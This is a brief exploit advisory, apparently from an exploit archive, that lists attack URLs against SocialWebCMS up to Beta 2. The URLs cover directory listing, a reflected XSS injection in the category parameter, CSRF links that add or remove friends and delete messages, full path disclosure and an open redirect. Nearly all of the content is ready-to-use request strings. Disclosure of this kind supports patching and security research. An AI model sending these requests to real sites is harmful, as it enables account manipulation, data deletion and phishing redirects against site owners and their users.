36 lines
No EOL
923 B
Text
36 lines
No EOL
923 B
Text
# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<http://gmail.com/>
|
|
# Software Link: http://www.socialwebcms.com
|
|
# Version: X <= Beta 2
|
|
#
|
|
# Vulnz:
|
|
#
|
|
#[Directory Listing]
|
|
http://server/modules/
|
|
#
|
|
#
|
|
#[XSS]
|
|
http://server/index.php?category=%22%3E[XSS]
|
|
#
|
|
#
|
|
#[CSRF]
|
|
-Add friends:
|
|
http://server/user/view/addfriend/login/[VALID_FRIEND]
|
|
or
|
|
http://server/user.php?login=[VALID_FRIEND]&view=addfriend
|
|
#
|
|
-Remove friends:
|
|
http://server]/user/view/removefriend/login/[VALID_FRIEND]
|
|
or
|
|
http://server/user.php?login=[VALID_FRIEND]&view=removefriend
|
|
#
|
|
-Remove Messages:
|
|
http://server/module.php?module=simple_messaging&view=delmsg&msg_id=[MESSAGE_ID]
|
|
#
|
|
#
|
|
#[Full Path Disclosure] (From Unlogged Browsing)
|
|
http://server/module.php?module=simple_messaging&view=delmsg&msg_id=
|
|
#
|
|
#[User Redirection]
|
|
http://server/module.php?module=simple_messaging&view=compose&to=[VALID_FRIEND]&return=[URL]
|
|
#
|
|
# EOF |